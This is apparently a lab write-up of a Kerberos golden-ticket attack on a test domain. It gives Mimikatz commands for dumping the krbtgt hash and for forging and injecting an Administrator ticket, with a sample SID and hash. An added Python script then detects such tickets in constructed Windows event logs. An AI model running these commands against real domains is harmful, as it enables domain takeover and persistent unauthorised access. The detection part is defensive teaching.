Golden Ticket Attack

To perform this attack we need the NTLM hash of the krbtgt account. The KDC encrypts and signs every TGT in the domain with this key, so whoever holds it can forge a TGT (a "golden ticket") for any user, even one that does not exist, without ever contacting a domain controller. Dumping the hash already requires Domain Admin (or equivalent) access to a domain controller, so this is a persistence technique rather than an initial-compromise one: once the golden ticket works we have full control over the entire domain, and the forged tickets stay valid until the krbtgt password has been rotated twice.

I enumerated the domain SID and the NTLM hash of krbtgt from the domain controller with Mimikatz (run privilege::debug first, or run Mimikatz as SYSTEM, and use an account with admin rights on the DC): lsadump::lsa /inject /name:krbtgt

Then I created a golden ticket for the built-in Administrator account and injected it straight into the current logon session (/ptt, pass-the-ticket) instead of writing it to a .kirbi file: kerberos::golden /User:Administrator /domain:marvel.local /sid:S-1-5-21-2171057704-3879275708-2899333543 /krbtgt:955ad34fdcb7752df007b34b3aa2ed00 /id:500 /ptt. Here /domain is the DNS name of the domain, /sid is the domain SID without a trailing RID, /krbtgt is the NTLM hash dumped in the previous step and /id is the RID of the account to impersonate (500 is the built-in Administrator). Mimikatz gives the ticket a ten-year lifetime by default, far beyond the usual ten-hour TGT lifetime, which is one of the things a defender can look for.

Once the golden ticket was created, I issued the following command, which launches a new command prompt that inherits the logon session holding the forged ticket: misc::cmd. Running klist in that prompt should show the injected TGT for Administrator.

From this new command prompt I can authenticate to any Kerberos-enabled service in the domain as Administrator: list shares on the domain controller, enumerate other domain machines, or run PsExec to get a SYSTEM shell on any of them. Connect by hostname rather than IP address, because Kerberos needs a service principal name to issue a service ticket; connecting by IP falls back to NTLM and the forged ticket is never used.
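As an added example that is not part of the original write-up, the following Python script shows how the same activity looks from the defender's side. It runs two well-known golden-ticket heuristics over a handful of constructed Windows Security event records (not real logs): a TGS request (4769) for an account and client with no preceding TGT request (4768) or renewal (4770) within the normal TGT lifetime, which is exactly what a TGT forged offline produces, and a logon (4624) whose Account Domain carries the DNS name passed to /domain (marvel.local) instead of the NetBIOS name (MARVEL). The record layout, field names, IP addresses and the MARVEL NetBIOS name are assumptions made for the example.

```python
"""Golden ticket indicators in Windows Security events (constructed sample).

A TGT forged with the krbtgt key never passes through the KDC's AS exchange,
so the first trace on a DC is a TGS request (4769) for an account and client
that have no preceding TGT request (4768) or renewal (4770). A ticket with
the Mimikatz default ten-year lifetime is also never renewed, so the gap only
grows. Mimikatz further copies the /domain value into the ticket verbatim,
so logons made with it (4624) show the DNS domain name ("marvel.local") in
Account Domain where native logons show the NetBIOS name ("MARVEL").
"""
import json
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Tuple

# Constructed sample records (not real logs), one JSON object per line, in the
# shape a log shipper might emit: time, event id, account, domain, client IP.
SAMPLE_LOG = """\
{"time": "2024-03-01T09:00:00", "event_id": 4768, "account": "jdoe", "domain": "MARVEL", "client": "10.0.0.25"}
{"time": "2024-03-01T09:00:01", "event_id": 4769, "account": "jdoe@MARVEL.LOCAL", "domain": "MARVEL.LOCAL", "client": "10.0.0.25"}
{"time": "2024-03-01T09:05:00", "event_id": 4624, "account": "jdoe", "domain": "MARVEL", "client": "10.0.0.25"}
{"time": "2024-03-01T10:30:00", "event_id": 4769, "account": "Administrator@MARVEL.LOCAL", "domain": "MARVEL.LOCAL", "client": "10.0.0.77"}
{"time": "2024-03-01T10:30:02", "event_id": 4624, "account": "Administrator", "domain": "marvel.local", "client": "10.0.0.77"}
{"time": "2024-03-01T20:30:00", "event_id": 4769, "account": "jdoe@MARVEL.LOCAL", "domain": "MARVEL.LOCAL", "client": "10.0.0.25"}
"""


@dataclass(frozen=True)
class Event:
    time: datetime
    event_id: int
    account: str  # lower-case, realm suffix stripped
    domain: str
    client: str


def normalise_account(name: str) -> str:
    """4769 records the UPN form 'user@REALM'; 4768/4624 record the bare name."""
    return name.split("@", 1)[0].lower()


def parse_events(text: str) -> List[Event]:
    """Parse one JSON record per line into Events, oldest first."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        events.append(Event(
            time=datetime.fromisoformat(rec["time"]),
            event_id=int(rec["event_id"]),
            account=normalise_account(rec["account"]),
            domain=rec["domain"],
            client=rec["client"],
        ))
    return sorted(events, key=lambda e: e.time)


def find_golden_ticket_indicators(events: List[Event], netbios_domain: str,
                                  max_tgt_age: timedelta = timedelta(hours=10)
                                  ) -> List[Tuple[str, str, str]]:
    """Return (rule, account, client) for each suspicious event.

    max_tgt_age is the default TGT lifetime: a 4769 whose most recent 4768/4770
    from the same client is older than that should not exist for a real ticket.
    """
    last_tgt = {}  # (account, client) -> time of the last TGT request or renewal
    hits = []
    for ev in events:
        key = (ev.account, ev.client)
        if ev.event_id in (4768, 4770):
            last_tgt[key] = ev.time
        elif ev.event_id == 4769:
            seen = last_tgt.get(key)
            if seen is None or ev.time - seen > max_tgt_age:
                hits.append(("4769 without preceding 4768", ev.account, ev.client))
        elif ev.event_id == 4624:
            # Native logons carry the NetBIOS name; a dotted name is the
            # /domain value Mimikatz wrote into the forged ticket.
            if "." in ev.domain and ev.domain.upper() != netbios_domain.upper():
                hits.append(("4624 Account Domain is DNS name", ev.account, ev.client))
    return hits


if __name__ == "__main__":
    for rule, account, client in find_golden_ticket_indicators(parse_events(SAMPLE_LOG), "MARVEL"):
        print(f"{rule}: {account} from {client}")
```

Against the sample data the Administrator session from 10.0.0.77 trips both rules, and jdoe's evening TGS request trips the age rule because no renewal was logged. Two practical points: 4768 and 4769 for one session are often served by different domain controllers, so the events have to be collected from every DC before correlation, and the domain-name heuristic only fires when the attacker passed the DNS name to /domain, as in the write-up above; the missing-4768 rule is the one to rely on.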
